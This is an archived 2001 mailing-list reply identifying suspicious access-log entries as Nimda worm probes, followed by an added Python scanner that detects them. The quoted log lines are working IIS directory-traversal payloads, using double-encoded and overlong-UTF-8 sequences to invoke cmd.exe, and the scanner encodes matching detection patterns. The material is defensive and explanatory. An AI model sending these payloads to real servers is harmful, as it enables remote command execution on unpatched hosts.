
Re: [cobalt-users] access log weird stuff. hacker or virus




That should be a Nimda worm attack :)

On Fri, 28 Sep 2001 00:45:41 -0400, brain_damaged wrote:

>Hello,
>I went and checked my access log and saw this stuff.
>Looking for winnt on a Linux system?
>
>
> tail access
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 280 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
>www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"

<SNIP>
Bye!!!
					FTC.
ftc@xxxxxxxxxx
http://www.shadowsun.com.ar/~fvoges

- ---------------------------------------------------------------------------
  Everything has an end, but a sausage has two.
- ---------------------------------------------------------------------------

- -----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GCS/IT/O d- s+ a- C++>+++ UL+++>++++$ P+ L++>+++$ E--- W+++$ N o? K? w-- O++ M>+++$ V--
PS PE Y+ PGP+ t+ 5 X+ R+ tv+ b+ !DI D G e h! r% y?
- ------END GEEK CODE BLOCK------

PGP Public Key Fingerprint: A536 4595 EB6F D197  FBC1 5C3A 145C 2516

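An added example, not part of the original thread: a small Python scanner that flags the kind of requests quoted above by decoding the request target and checking for double percent-encoding, invalid UTF-8 lead bytes, directory traversal and a `cmd.exe` target. The log regex and the names `LOG_RE`, `classify` and `scan` are assumptions made for this sketch; the sample lines are the four quoted log entries plus one constructed benign request.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed pattern for the vhost-prefixed access log format quoted in the post.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def classify(target):
    """Return the set of reasons a request target looks like a traversal probe."""
    reasons = set()
    once = unquote_to_bytes(target)
    # An escape that survives one decode was double-encoded (%255c -> %5c).
    if re.search(rb'%[0-9a-fA-F]{2}', once):
        reasons.add("double-encoding")
    # 0xC0 and 0xC1 are never valid in UTF-8; they only show up in
    # overlong or malformed sequences such as %c0%2f and %c1%1c.
    if b'\xc0' in once or b'\xc1' in once:
        reasons.add("overlong-utf8")
    twice = unquote_to_bytes(once)  # decode again, as a lenient server might
    if re.search(rb'\.\.[/\\]', twice):
        reasons.add("traversal")
    if b'cmd.exe' in twice.lower():
        reasons.add("cmd.exe")
    return reasons

def scan(lines):
    """Return (ip, target, reasons) for every parsed line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            reasons = classify(m.group("target"))
            if reasons:
                hits.append((m.group("ip"), m.group("target"), reasons))
    return hits

# Four lines from the quoted log, plus one constructed benign request (last).
SAMPLE = [
    'www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 280 "-" "-"',
    'www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 308 "-" "-"',
    'www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"',
    'www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"',
    'www.example.com 192.0.2.10 - - [28/Sep/2001:00:31:02 -0400] "GET /files/my%20report.pdf HTTP/1.0" 200 1043 "-" "-"',
]

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE):
        print(ip, sorted(reasons), target)
```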